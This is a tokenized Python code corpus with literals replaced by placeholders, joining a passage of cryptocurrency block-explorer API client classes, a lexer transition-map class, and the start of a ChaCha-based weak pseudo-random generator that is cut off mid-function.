join ( addresses ) ) <EOL> utxos = [ ] <EOL> for utxo in self . get_url ( url ) . json ( ) : <EOL> utxos . append ( self . _format_utxo ( utxo ) ) <EOL> return utxos <EOL> def get_block ( self , crypto , block_number = '<STR_LIT>' , block_hash = '<STR_LIT>' , latest = False ) : <EOL> if latest : <EOL> url = "<STR_LIT>" % ( self . protocol , self . domain ) <EOL> block_hash = self . get_url ( url ) . json ( ) [ '<STR_LIT>' ] <EOL> elif block_number : <EOL> url = "<STR_LIT>" % ( self . protocol , self . domain , block_number ) <EOL> block_hash = self . get_url ( url ) . json ( ) [ '<STR_LIT>' ] <EOL> url = "<STR_LIT>" % ( self . protocol , self . domain , block_hash ) <EOL> r = self . get_url ( url ) . json ( ) <EOL> return dict ( <EOL> block_number = r [ '<STR_LIT>' ] , <EOL> version = r [ '<STR_LIT:version>' ] , <EOL> confirmations = r [ '<STR_LIT>' ] , <EOL> time = arrow . get ( r [ '<STR_LIT:time>' ] ) . datetime , <EOL> mining_difficulty = float ( r [ '<STR_LIT>' ] ) , <EOL> size = r [ '<STR_LIT:size>' ] , <EOL> hash = r [ '<STR_LIT>' ] , <EOL> merkle_root = r [ '<STR_LIT>' ] , <EOL> previous_hash = r [ '<STR_LIT>' ] , <EOL> next_hash = r . get ( '<STR_LIT>' , None ) , <EOL> txids = r [ '<STR_LIT>' ] , <EOL> tx_count = len ( r [ '<STR_LIT>' ] ) <EOL> ) <EOL> def push_tx ( self , crypto , tx_hex ) : <EOL> url = "<STR_LIT>" % ( self . protocol , self . domain ) <EOL> return self . post_url ( url , { '<STR_LIT>' : tx_hex } ) . json ( ) [ '<STR_LIT>' ] <EOL> def get_optimal_fee ( self , crypto , tx_bytes ) : <EOL> url = "<STR_LIT>" % ( self . protocol , self . domain ) <EOL> return self . get_url ( url ) . 
json ( ) <EOL> class MYRCryptap ( BitpayInsight ) : <EOL> service_id = <NUM_LIT:30> <EOL> protocol = '<STR_LIT:http>' <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> domain = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> class BirdOnWheels ( BitpayInsight ) : <EOL> service_id = <NUM_LIT> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> domain = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> class ThisIsVTC ( BitpayInsight ) : <EOL> service_id = <NUM_LIT:32> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> domain = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> class ReddcoinCom ( BitpayInsight ) : <EOL> service_id = <NUM_LIT> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> domain = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> class CoinTape ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> api_homepage = "<STR_LIT>" <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> base_url = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_optimal_fee ( self , crypto , tx_bytes ) : <EOL> url = self . base_url + "<STR_LIT>" <EOL> response = self . get_url ( url ) . json ( ) <EOL> return int ( response [ '<STR_LIT>' ] * tx_bytes ) <EOL> class BitGo ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> api_homepage = '<STR_LIT>' <EOL> name = "<STR_LIT>" <EOL> base_url = "<STR_LIT>" <EOL> optimalFeeNumBlocks = <NUM_LIT:1> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . base_url , address ) <EOL> response = self . get_url ( url ) . json ( ) <EOL> if confirmations == <NUM_LIT:0> : <EOL> return response [ '<STR_LIT>' ] / <NUM_LIT> <EOL> if confirmations == <NUM_LIT:1> : <EOL> return response [ '<STR_LIT>' ] / <NUM_LIT> <EOL> else : <EOL> raise SkipThisService ( '<STR_LIT>' ) <EOL> def get_transactions ( self , crypto , address ) : <EOL> url = "<STR_LIT>" % ( self . base_url , address ) <EOL> response = self . get_url ( url ) . 
json ( ) <EOL> txs = [ ] <EOL> for tx in response [ '<STR_LIT>' ] : <EOL> my_outs = [ x [ '<STR_LIT:value>' ] for x in tx [ '<STR_LIT>' ] if x [ '<STR_LIT>' ] == address ] <EOL> txs . append ( dict ( <EOL> amount = sum ( my_outs ) , <EOL> date = arrow . get ( tx [ '<STR_LIT:date>' ] ) . datetime , <EOL> txid = tx [ '<STR_LIT:id>' ] , <EOL> confirmations = tx [ '<STR_LIT>' ] , <EOL> ) ) <EOL> return txs <EOL> def get_unspent_outputs ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( self . base_url , address ) <EOL> utxos = [ ] <EOL> for utxo in self . get_url ( url ) . json ( ) [ '<STR_LIT>' ] : <EOL> utxos . append ( dict ( <EOL> output = "<STR_LIT>" % ( utxo [ '<STR_LIT>' ] , utxo [ '<STR_LIT>' ] ) , <EOL> amount = utxo [ '<STR_LIT:value>' ] , <EOL> confirmations = utxo [ '<STR_LIT>' ] , <EOL> address = address <EOL> ) ) <EOL> return utxos <EOL> def get_block ( self , crypto , block_number = '<STR_LIT>' , block_hash = '<STR_LIT>' , latest = False ) : <EOL> if latest : <EOL> url = "<STR_LIT>" <EOL> else : <EOL> url = "<STR_LIT>" + block_number + block_hash <EOL> r = self . get_url ( self . base_url + url ) <EOL> return dict ( <EOL> block_number = r [ '<STR_LIT>' ] , <EOL> time = arrow . get ( r [ '<STR_LIT:date>' ] ) . datetime , <EOL> hash = r [ '<STR_LIT:id>' ] , <EOL> previous_hash = r [ '<STR_LIT>' ] , <EOL> txids = r [ '<STR_LIT>' ] , <EOL> tx_count = len ( r [ '<STR_LIT>' ] ) <EOL> ) <EOL> def get_optimal_fee ( self , crypto , tx_bytes ) : <EOL> url = "<STR_LIT>" % ( self . base_url , self . optimalFeeNumBlocks ) <EOL> response = self . get_url ( url ) . json ( ) <EOL> fee_kb = response [ '<STR_LIT>' ] <EOL> return int ( tx_bytes * fee_kb / <NUM_LIT> ) <EOL> class Blockonomics ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> api_homepage = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> return self . 
get_balance_multi ( crypto , [ address ] , confirmations ) [ address ] <EOL> def get_balance_multi ( self , crypto , addresses , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" <EOL> if hasattr ( addresses , '<STR_LIT>' ) and addresses . startswith ( "<STR_LIT>" ) : <EOL> body = { '<STR_LIT>' : addresses } <EOL> else : <EOL> body = { '<STR_LIT>' : '<STR_LIT:U+0020>' . join ( addresses ) } <EOL> response = self . post_url ( url , json . dumps ( body ) ) . json ( ) <EOL> balances = { } <EOL> for data in response [ '<STR_LIT>' ] : <EOL> confirmed = data [ '<STR_LIT>' ] / <NUM_LIT> <EOL> if confirmations == <NUM_LIT:0> : <EOL> balance = confirmed + ( data [ '<STR_LIT>' ] / <NUM_LIT> ) <EOL> if confirmations == <NUM_LIT:1> : <EOL> balance = confirmed <EOL> else : <EOL> raise SkipThisService ( "<STR_LIT>" ) <EOL> balances [ data [ '<STR_LIT>' ] ] = balance <EOL> return balances <EOL> def get_transactions ( self , crypto , address ) : <EOL> url = "<STR_LIT>" <EOL> response = self . post_url ( url , json . dumps ( { '<STR_LIT>' : address } ) ) . json ( ) <EOL> txs = [ ] <EOL> for tx in response [ '<STR_LIT>' ] : <EOL> txs . append ( dict ( <EOL> amount = tx [ '<STR_LIT:value>' ] / <NUM_LIT> , <EOL> date = arrow . get ( tx [ '<STR_LIT:time>' ] ) . datetime , <EOL> txid = tx [ '<STR_LIT>' ] , <EOL> ) ) <EOL> return txs <EOL> class BlockExplorerCom ( BitpayInsight ) : <EOL> service_id = <NUM_LIT> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> domain = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> class BitNodes ( Service ) : <EOL> domain = "<STR_LIT>" <EOL> service_id = <NUM_LIT> <EOL> name = "<STR_LIT>" <EOL> def get_nodes ( self , crypto ) : <EOL> response = self . get_url ( self . domain + "<STR_LIT>" ) <EOL> nodes_dict = response . json ( ) [ '<STR_LIT>' ] <EOL> nodes = [ ] <EOL> for address , data in nodes_dict . items ( ) : <EOL> nodes . 
append ( { <EOL> '<STR_LIT:address>' : address , <EOL> '<STR_LIT>' : data [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : data [ <NUM_LIT:1> ] , <EOL> '<STR_LIT>' : arrow . get ( data [ <NUM_LIT:2> ] ) . datetime , <EOL> '<STR_LIT>' : data [ <NUM_LIT:3> ] , <EOL> '<STR_LIT>' : data [ <NUM_LIT:4> ] , <EOL> '<STR_LIT>' : data [ <NUM_LIT:5> ] , <EOL> '<STR_LIT>' : data [ <NUM_LIT:6> ] , <EOL> '<STR_LIT>' : data [ <NUM_LIT:7> ] , <EOL> '<STR_LIT>' : data [ <NUM_LIT:8> ] , <EOL> '<STR_LIT>' : data [ <NUM_LIT:9> ] , <EOL> '<STR_LIT>' : data [ <NUM_LIT:10> ] , <EOL> '<STR_LIT>' : data [ <NUM_LIT:11> ] , <EOL> '<STR_LIT>' : data [ <NUM_LIT:12> ] <EOL> } ) <EOL> return nodes <EOL> class BitcoinFees21 ( CoinTape ) : <EOL> base_url = "<STR_LIT>" <EOL> service_id = <NUM_LIT> <EOL> name = "<STR_LIT>" <EOL> api_homepage = "<STR_LIT>" <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> class ChainRadar ( Service ) : <EOL> api_homepage = "<STR_LIT>" <EOL> service_id = <NUM_LIT> <EOL> name = "<STR_LIT>" <EOL> supported_cryptos = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def get_block ( self , crypto , block_number = '<STR_LIT>' , block_hash = '<STR_LIT>' , latest = False ) : <EOL> if latest : <EOL> url = "<STR_LIT>" % crypto <EOL> block_number = self . get_url ( url ) . json ( ) [ '<STR_LIT>' ] <EOL> url = "<STR_LIT>" % ( crypto , block_number or block_hash ) <EOL> r = self . get_url ( url ) . json ( ) <EOL> h = r [ '<STR_LIT>' ] <EOL> return dict ( <EOL> block_number = h [ '<STR_LIT>' ] , <EOL> time = arrow . get ( h [ '<STR_LIT>' ] ) . 
datetime , <EOL> size = h [ '<STR_LIT>' ] , <EOL> hash = h [ '<STR_LIT>' ] , <EOL> previous_hash = h [ '<STR_LIT>' ] , <EOL> txids = [ x [ '<STR_LIT>' ] for x in r [ '<STR_LIT>' ] ] , <EOL> tx_count = len ( r [ '<STR_LIT>' ] ) <EOL> ) <EOL> class Mintr ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> name = "<STR_LIT>" <EOL> domain = "<STR_LIT>" <EOL> supported_cryptos = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> api_homepage = "<STR_LIT>" <EOL> explorer_tx_url = "<STR_LIT>" <EOL> explorer_address_url = "<STR_LIT>" <EOL> explorer_blocknum_url = "<STR_LIT>" <EOL> explorer_blockhash_url = "<STR_LIT>" <EOL> @ classmethod <EOL> def _get_coin ( cls , crypto ) : <EOL> if crypto == '<STR_LIT>' : <EOL> return '<STR_LIT>' <EOL> if crypto == '<STR_LIT>' : <EOL> return '<STR_LIT>' <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( <EOL> self . domain . format ( coin = self . _get_coin ( crypto ) ) , address <EOL> ) <EOL> r = self . get_url ( url ) . json ( ) <EOL> if '<STR_LIT:error>' in r : <EOL> raise Exception ( "<STR_LIT>" % r [ '<STR_LIT:error>' ] ) <EOL> return float ( r [ '<STR_LIT>' ] ) <EOL> def get_single_transaction ( self , crypto , txid ) : <EOL> url = "<STR_LIT>" % ( <EOL> self . domain . format ( coin = self . _get_coin ( crypto ) ) , txid <EOL> ) <EOL> d = self . get_url ( url ) . json ( ) <EOL> return dict ( <EOL> time = arrow . get ( d [ '<STR_LIT:time>' ] ) . 
datetime , <EOL> total_in = float ( d [ '<STR_LIT>' ] ) , <EOL> total_out = float ( d [ '<STR_LIT>' ] ) , <EOL> fee = float ( d [ '<STR_LIT>' ] ) , <EOL> inputs = [ { '<STR_LIT:address>' : x [ '<STR_LIT:address>' ] , '<STR_LIT:value>' : x [ '<STR_LIT:value>' ] } for x in d [ '<STR_LIT>' ] ] , <EOL> outputs = [ { '<STR_LIT:address>' : x [ '<STR_LIT:address>' ] , '<STR_LIT:value>' : x [ '<STR_LIT:value>' ] } for x in d [ '<STR_LIT>' ] ] , <EOL> txid = txid , <EOL> ) <EOL> def get_block ( self , crypto , block_number = '<STR_LIT>' , block_hash = '<STR_LIT>' , latest = False ) : <EOL> if block_number : <EOL> by = "<STR_LIT>" <EOL> elif block_hash : <EOL> by = "<STR_LIT>" <EOL> url = "<STR_LIT>" % ( <EOL> self . domain . format ( coin = self . _get_coin ( crypto ) ) , <EOL> by , block_hash or block_number <EOL> ) <EOL> b = self . get_url ( url ) . json ( ) <EOL> return dict ( <EOL> block_number = int ( b [ '<STR_LIT>' ] ) , <EOL> time = arrow . get ( b [ '<STR_LIT:time>' ] ) . datetime , <EOL> hash = b [ '<STR_LIT>' ] , <EOL> previous_hash = b [ '<STR_LIT>' ] , <EOL> txids = [ x [ '<STR_LIT>' ] for x in b [ '<STR_LIT>' ] ] , <EOL> tx_count = int ( b [ '<STR_LIT>' ] ) , <EOL> size = int ( b [ '<STR_LIT:size>' ] ) , <EOL> sent_value = float ( b [ '<STR_LIT>' ] ) + float ( b [ '<STR_LIT>' ] ) , <EOL> mining_difficulty = float ( b [ '<STR_LIT>' ] ) , <EOL> merkle_root = b [ '<STR_LIT>' ] , <EOL> total_fees = float ( b [ '<STR_LIT>' ] ) <EOL> ) <EOL> class BlockExplorersNet ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> domain = "<STR_LIT>" <EOL> supported_cryptos = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> name = "<STR_LIT>" <EOL> explorer_tx_url = "<STR_LIT>" <EOL> explorer_address_url = "<STR_LIT>" <EOL> explorer_blockhash_url = "<STR_LIT>" <EOL> @ classmethod <EOL> def _get_coin ( cls , crypto ) : <EOL> if crypto == '<STR_LIT>' : <EOL> return "<STR_LIT>" <EOL> if crypto == '<STR_LIT>' : <EOL> return '<STR_LIT>' <EOL> if crypto == '<STR_LIT>' : <EOL> return 
'<STR_LIT>' <EOL> def get_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( <EOL> self . domain . format ( coin = self . _get_coin ( crypto ) ) , address <EOL> ) <EOL> return float ( self . get_url ( url ) . content ) <EOL> def get_transactions ( self , crypto , address ) : <EOL> domain = self . domain . format ( coin = self . _get_coin ( crypto ) ) <EOL> url = "<STR_LIT>" % ( domain , address ) <EOL> return self . get_url ( url ) . json ( ) <EOL> def get_single_transaction ( self , crypto , txid ) : <EOL> domain = self . domain . format ( coin = self . _get_coin ( crypto ) ) <EOL> url = "<STR_LIT>" % ( domain , txid ) <EOL> d = self . get_url ( url ) . json ( ) <EOL> if not d [ '<STR_LIT>' ] or not d [ '<STR_LIT>' ] [ <NUM_LIT:0> ] . get ( '<STR_LIT>' ) : <EOL> ins = [ { '<STR_LIT>' : x [ '<STR_LIT>' ] } for x in d [ '<STR_LIT>' ] ] <EOL> else : <EOL> ins = [ { '<STR_LIT>' : x [ '<STR_LIT>' ] } for x in d [ '<STR_LIT>' ] ] <EOL> outs = [ { '<STR_LIT:address>' : x [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , '<STR_LIT:value>' : x [ '<STR_LIT:value>' ] } for x in d [ '<STR_LIT>' ] ] <EOL> return dict ( <EOL> time = arrow . get ( d [ '<STR_LIT:time>' ] ) . datetime , <EOL> block_hash = d [ '<STR_LIT>' ] , <EOL> hex = d [ '<STR_LIT>' ] , <EOL> inputs = ins , <EOL> outputs = outs , <EOL> txid = txid , <EOL> total_out = sum ( x [ '<STR_LIT:value>' ] for x in outs ) , <EOL> confirmations = d [ '<STR_LIT>' ] , <EOL> ) <EOL> def get_block ( self , crypto , block_number = '<STR_LIT>' , block_hash = '<STR_LIT>' , latest = False ) : <EOL> domain = self . domain . format ( coin = self . _get_coin ( crypto ) ) <EOL> if latest : <EOL> url = "<STR_LIT>" % domain <EOL> block_number = int ( self . get_url ( url ) . content ) <EOL> if block_number : <EOL> url = "<STR_LIT>" % ( domain , block_number ) <EOL> block_hash = self . get_url ( url ) . content <EOL> url = "<STR_LIT>" % ( domain , block_hash ) <EOL> r = self . 
get_url ( url ) . json ( ) <EOL> return dict ( <EOL> confirmations = r [ '<STR_LIT>' ] , <EOL> size = r [ '<STR_LIT:size>' ] , <EOL> txs = r [ '<STR_LIT>' ] , <EOL> tx_count = len ( r [ '<STR_LIT>' ] ) , <EOL> time = arrow . get ( r [ '<STR_LIT:time>' ] ) . datetime , <EOL> hash = r [ '<STR_LIT>' ] , <EOL> block_number = r [ '<STR_LIT>' ] , <EOL> merkle_root = r [ '<STR_LIT>' ] , <EOL> difficulty = r [ '<STR_LIT>' ] , <EOL> ) <EOL> class UNOCryptap ( BitpayInsight ) : <EOL> service_id = <NUM_LIT> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> protocol = '<STR_LIT:http>' <EOL> domain = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> class RICCryptap ( BitpayInsight ) : <EOL> service_id = <NUM_LIT> <EOL> supported_cryptos = [ '<STR_LIT>' ] <EOL> protocol = '<STR_LIT:http>' <EOL> domain = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> class ProHashing ( Service ) : <EOL> service_id = <NUM_LIT> <EOL> domain = "<STR_LIT>" <EOL> name = "<STR_LIT>" <EOL> supported_cryptos = [ '<STR_LIT>' , ] <EOL> def get_address_balance ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> url = "<STR_LIT>" % ( <EOL> self . domain , address , self . _get_coin ( crypto ) <EOL> ) <EOL> r = self . get_url ( url ) . json ( ) <EOL> if r . get ( '<STR_LIT:message>' , None ) : <EOL> raise SkipThisService ( "<STR_LIT>" % r [ '<STR_LIT:message>' ] ) <EOL> return r [ '<STR_LIT>' ] <EOL> def get_transactions ( self , crypto , address , confirmations = <NUM_LIT:1> ) : <EOL> params = "<STR_LIT>" <EOL> url = "<STR_LIT>" % ( <EOL> params , address , self . _get_coin ( crypto ) <EOL> ) <EOL> return self . get_url ( url ) . json ( ) <EOL> def _get_coin ( self , crypto ) : <EOL> from crypto_data import crypto_data <EOL> full_name = crypto_data [ crypto ] [ '<STR_LIT:name>' ] <EOL> url = "<STR_LIT>" % ( <EOL> self . domain , full_name <EOL> ) <EOL> r = self . get_url ( url ) . json ( ) <EOL> if r . 
get ( '<STR_LIT:message>' , None ) : <EOL> raise SkipThisService ( "<STR_LIT>" % r [ '<STR_LIT:message>' ] ) <EOL> return r [ '<STR_LIT:id>' ] <EOL> def get_block ( self , crypto , block_number = '<STR_LIT>' , block_hash = '<STR_LIT>' , latest = False ) : <EOL> if latest or block_hash : <EOL> raise SkipThisService ( "<STR_LIT>" ) <EOL> url = "<STR_LIT>" % ( <EOL> self . domain , self . _get_coin ( crypto ) , <EOL> ) <EOL> if block_hash : <EOL> url = "<STR_LIT>" % ( <EOL> url , block_hash <EOL> ) <EOL> r = self . get_url ( url ) . json ( ) <EOL> return dict ( <EOL> confirmations = r [ '<STR_LIT>' ] , <EOL> size = r [ '<STR_LIT:size>' ] , <EOL> txs = [ x [ '<STR_LIT>' ] for x in r [ '<STR_LIT>' ] ] , <EOL> tx_count = len ( r [ '<STR_LIT>' ] ) , <EOL> hash = r [ '<STR_LIT>' ] , <EOL> block_number = r [ '<STR_LIT>' ] , <EOL> difficulty = r [ '<STR_LIT>' ] , <EOL> ) </s>
<s> from copy import copy <EOL> import string <EOL> from sys import maxint <EOL> from types import TupleType <EOL> class TransitionMap : <EOL> """<STR_LIT>""" <EOL> map = None <EOL> special = None <EOL> def __init__ ( self , map = None , special = None ) : <EOL> if not map : <EOL> map = [ - maxint , { } , maxint ] <EOL> if not special : <EOL> special = { } <EOL> self . map = map <EOL> self . special = special <EOL> def add ( self , event , new_state , <EOL> TupleType = TupleType ) : <EOL> """<STR_LIT>""" <EOL> if type ( event ) == TupleType : <EOL> code0 , code1 = event <EOL> i = self . split ( code0 ) <EOL> j = self . split ( code1 ) <EOL> map = self . map <EOL> while i < j : <EOL> map [ i + <NUM_LIT:1> ] [ new_state ] = <NUM_LIT:1> <EOL> i = i + <NUM_LIT:2> <EOL> else : <EOL> self . get_special ( event ) [ new_state ] = <NUM_LIT:1> <EOL> def add_set ( self , event , new_set , <EOL> TupleType = TupleType ) : <EOL> """<STR_LIT>""" <EOL> if type ( event ) == TupleType : <EOL> code0 , code1 = event <EOL> i = self . split ( code0 ) <EOL> j = self . split ( code1 ) <EOL> map = self . map <EOL> while i < j : <EOL> map [ i + <NUM_LIT:1> ] . update ( new_set ) <EOL> i = i + <NUM_LIT:2> <EOL> else : <EOL> self . get_special ( event ) . update ( new_set ) <EOL> def get_epsilon ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . special . get ( '<STR_LIT>' ) <EOL> def items ( self , <EOL> len = len ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> map = self . map <EOL> else_set = map [ <NUM_LIT:1> ] <EOL> i = <NUM_LIT:0> <EOL> n = len ( map ) - <NUM_LIT:1> <EOL> code0 = map [ <NUM_LIT:0> ] <EOL> while i < n : <EOL> set = map [ i + <NUM_LIT:1> ] <EOL> code1 = map [ i + <NUM_LIT:2> ] <EOL> if set or else_set : <EOL> result . append ( ( ( code0 , code1 ) , set ) ) <EOL> code0 = code1 <EOL> i = i + <NUM_LIT:2> <EOL> for event , set in self . special . items ( ) : <EOL> if set : <EOL> result . 
append ( ( event , set ) ) <EOL> return result <EOL> def split ( self , code , <EOL> len = len , maxint = maxint ) : <EOL> """<STR_LIT>""" <EOL> map = self . map <EOL> hi = len ( map ) - <NUM_LIT:1> <EOL> if code == maxint : <EOL> return hi <EOL> lo = <NUM_LIT:0> <EOL> while hi - lo >= <NUM_LIT:4> : <EOL> mid = ( ( lo + hi ) / <NUM_LIT:2> ) & ~ <NUM_LIT:1> <EOL> if code < map [ mid ] : <EOL> hi = mid <EOL> else : <EOL> lo = mid <EOL> if map [ lo ] == code : <EOL> return lo <EOL> else : <EOL> map [ hi : hi ] = [ code , map [ hi - <NUM_LIT:1> ] . copy ( ) ] <EOL> return hi <EOL> def get_special ( self , event ) : <EOL> """<STR_LIT>""" <EOL> special = self . special <EOL> set = special . get ( event , None ) <EOL> if not set : <EOL> set = { } <EOL> special [ event ] = set <EOL> return set <EOL> def __str__ ( self ) : <EOL> map_strs = [ ] <EOL> map = self . map <EOL> n = len ( map ) <EOL> i = <NUM_LIT:0> <EOL> while i < n : <EOL> code = map [ i ] <EOL> if code == - maxint : <EOL> code_str = "<STR_LIT>" <EOL> elif code == maxint : <EOL> code_str = "<STR_LIT>" <EOL> else : <EOL> code_str = str ( code ) <EOL> map_strs . append ( code_str ) <EOL> i = i + <NUM_LIT:1> <EOL> if i < n : <EOL> map_strs . append ( state_set_str ( map [ i ] ) ) <EOL> i = i + <NUM_LIT:1> <EOL> special_strs = { } <EOL> for event , set in self . special . items ( ) : <EOL> special_strs [ event ] = state_set_str ( set ) <EOL> return "<STR_LIT>" % ( <EOL> string . join ( map_strs , "<STR_LIT:U+002C>" ) , <EOL> special_strs <EOL> ) <EOL> def check ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . map [ - <NUM_LIT:3> ] < self . map [ - <NUM_LIT:1> ] : <EOL> print self <EOL> assert <NUM_LIT:0> <EOL> def dump ( self , file ) : <EOL> map = self . map <EOL> i = <NUM_LIT:0> <EOL> n = len ( map ) - <NUM_LIT:1> <EOL> while i < n : <EOL> self . dump_range ( map [ i ] , map [ i + <NUM_LIT:2> ] , map [ i + <NUM_LIT:1> ] , file ) <EOL> i = i + <NUM_LIT:2> <EOL> for event , set in self . special . 
items ( ) : <EOL> if set : <EOL> if not event : <EOL> event = '<STR_LIT>' <EOL> self . dump_trans ( event , set , file ) <EOL> def dump_range ( self , code0 , code1 , set , file ) : <EOL> if set : <EOL> if code0 == - maxint : <EOL> if code1 == maxint : <EOL> k = "<STR_LIT>" <EOL> else : <EOL> k = "<STR_LIT>" % self . dump_char ( code1 ) <EOL> elif code1 == maxint : <EOL> k = "<STR_LIT>" % self . dump_char ( code0 - <NUM_LIT:1> ) <EOL> elif code0 == code1 - <NUM_LIT:1> : <EOL> k = self . dump_char ( code0 ) <EOL> else : <EOL> k = "<STR_LIT>" % ( self . dump_char ( code0 ) , <EOL> self . dump_char ( code1 - <NUM_LIT:1> ) ) <EOL> self . dump_trans ( k , set , file ) <EOL> def dump_char ( self , code ) : <EOL> if <NUM_LIT:0> <= code <= <NUM_LIT:255> : <EOL> return repr ( chr ( code ) ) <EOL> else : <EOL> return "<STR_LIT>" % code <EOL> def dump_trans ( self , key , set , file ) : <EOL> file . write ( "<STR_LIT>" % ( key , self . dump_set ( set ) ) ) <EOL> def dump_set ( self , set ) : <EOL> return state_set_str ( set ) <EOL> def state_set_str ( set ) : <EOL> state_list = set . keys ( ) <EOL> str_list = [ ] <EOL> for state in state_list : <EOL> str_list . append ( "<STR_LIT>" % state . number ) <EOL> return "<STR_LIT>" % string . join ( str_list , "<STR_LIT:U+002C>" ) </s>
<s> import chacha <EOL> import os <EOL> import struct <EOL> import threading <EOL> class WeakPRNG ( object ) : <EOL> const32 = chacha . const32 <EOL> zero = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> def __init__ ( self , seed ) : <EOL> self . key = struct . unpack ( '<STR_LIT>' , seed ) <EOL> self . ctr = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> self . buf = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> def weakrandom32 ( self ) : <EOL> buf = self . buf <EOL> if buf [ <NUM_LIT:15> ] == <NUM_LIT:0> : <EOL> ctr = self . ctr <EOL> chacha . core ( <NUM_LIT:8> , buf , ctr , self . key , self . const32 ) <EOL> t = <NUM_LIT:1> <EOL> for i in range ( <NUM_LIT:4> ) : <EOL> t = ctr [ i ] + t <EOL> ctr [ i ] = t & <NUM_LIT> <EOL> t >>= <NUM_LIT:32> <EOL> r = buf [ <NUM_LIT:15> ] <EOL> buf [ <NUM_LIT:15> ] = <NUM_LIT:15> <EOL> return r <EOL> buf [ <NUM_LIT:15> ] -= <NUM_LIT:1> <EOL> return buf [ buf [ <NUM_LIT:15> ] ] <EOL> def weakrandom64 ( self ) : <EOL> rh = self . weakrandom32 ( ) <EOL> rl = self . weakrandom32 ( ) <EOL> return ( rh << <NUM_LIT:32> ) | rl <EOL> def weakrandom_uniform ( self , n ) : <EOL> assert <NUM_LIT:0> < n <EOL> nbits = n . bit_length ( ) <EOL> nwords = ( nbits + <NUM_LIT> ) / <NUM_LIT:32> <EOL> l = ( ( <NUM_LIT:1> << nbits ) - n ) % n <EOL> while True : <EOL> r = <NUM_LIT:0> <EOL> for i in range ( nwords ) : <EOL> r <<= <NUM_LIT:32> <EOL> r |= self . 
weakrandom32 ( ) <EOL> if r < l : <EOL> continue <EOL> return ( r % n ) <EOL> def weakrandom_bytearray ( self , buf , start , end ) : <EOL> assert end <= len ( buf ) <EOL> assert start <= end <EOL> nbytes = end - start <EOL> if nbytes < <NUM_LIT> : <EOL> nwords = nbytes / <NUM_LIT:4> <EOL> for i in range ( nwords ) : <EOL> buf [ start + <NUM_LIT:4> * i : start + <NUM_LIT:4> * ( i + <NUM_LIT:1> ) ] = struct . pack ( '<STR_LIT>' , self . weakrandom32 ( ) ) <EOL> nextra = nbytes - <NUM_LIT:4> * nwords <EOL> if <NUM_LIT:0> < nextra : <EOL> buf [ start + <NUM_LIT:4> * nwords : start + <NUM_LIT:4> * nwords + nextra ] = struct . pack ( '<STR_LIT>' , self . weakrandom32 ( ) ) [ <NUM_LIT:0> : nextra ] <EOL> else : <EOL> subkey = [ self . weakrandom32 ( ) for i in range ( <NUM_LIT:8> ) ] <EOL> const32 = self . const32 <EOL> ctr = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> out = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> nblocks = nbytes / <NUM_LIT:64> <EOL> 